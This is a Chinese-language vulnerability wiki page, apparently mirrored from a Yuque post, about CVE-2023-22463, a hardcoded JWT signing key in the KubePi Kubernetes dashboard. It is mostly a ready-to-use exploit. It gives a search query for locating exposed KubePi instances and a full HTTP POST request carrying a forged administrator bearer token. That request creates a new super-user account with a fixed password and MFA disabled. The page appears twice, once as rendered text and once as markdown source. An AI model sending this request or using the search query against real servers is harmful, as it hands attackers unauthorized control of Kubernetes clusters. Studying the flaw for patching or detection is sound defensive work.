fofamini-wiki

登录白背景

源码

KubePi JwtSigKey 登陆绕过漏洞 CVE-2023-22463

一、漏洞简介

KubePi 中存在 JWT硬编码，攻击者通过硬编码可以获取服务器后台管理权限，添加任意用户。

二、影响版本

KubePi

三、资产测绘

hunterapp.name="KubePi"
特征

四、漏洞复现

使用poc添加账户stc/stc.123

POST /kubepi/api/v1/users HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
accept: application/json
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8

{
  "authenticate": {
       "password": "stc.123"
  },
  "email": "stc@qq.com",
  "isAdmin": true,
  "mfa": {
          "enable": false
   },
  "name": "stc",
  "nickName": "stc",
  "roles": [
       "Supper User"
  ]
}

使用添加的账号stc/stc.123登录系统

原文: https://www.yuque.com/xiaokp7/ocvun2/vlb6klhncao1od9z

# KubePi JwtSigKey 登陆绕过漏洞 CVE-2023-22463

# 一、漏洞简介
KubePi 中存在 JWT硬编码，攻击者通过硬编码可以获取服务器后台管理权限，添加任意用户。

# 二、影响版本

- KubePi

# 三、资产测绘

- hunter`app.name="KubePi"`
- 特征

![image.png](./img/8aRf8uRr0gO5FwYs/1699712627687-0dd1421e-f47c-4b4b-a916-5462d6dcd3e7-966129.png)

# 四、漏洞复现
使用poc添加账户stc/stc.123
```
POST /kubepi/api/v1/users HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
accept: application/json
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8

{
  "authenticate": {
       "password": "stc.123"
  },
  "email": "stc@qq.com",
  "isAdmin": true,
  "mfa": {
          "enable": false
   },
  "name": "stc",
  "nickName": "stc",
  "roles": [
       "Supper User"
  ]
}
```
![image.png](./img/8aRf8uRr0gO5FwYs/1699712676602-804b5bef-1d8f-4cab-ae2e-4d96e8f3a6ed-319231.png)
使用添加的账号`stc/stc.123`登录系统
![image.png](./img/8aRf8uRr0gO5FwYs/1699712712295-0892271f-0497-44cd-90f2-5b9d41c8cbb7-680582.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vlb6klhncao1od9z>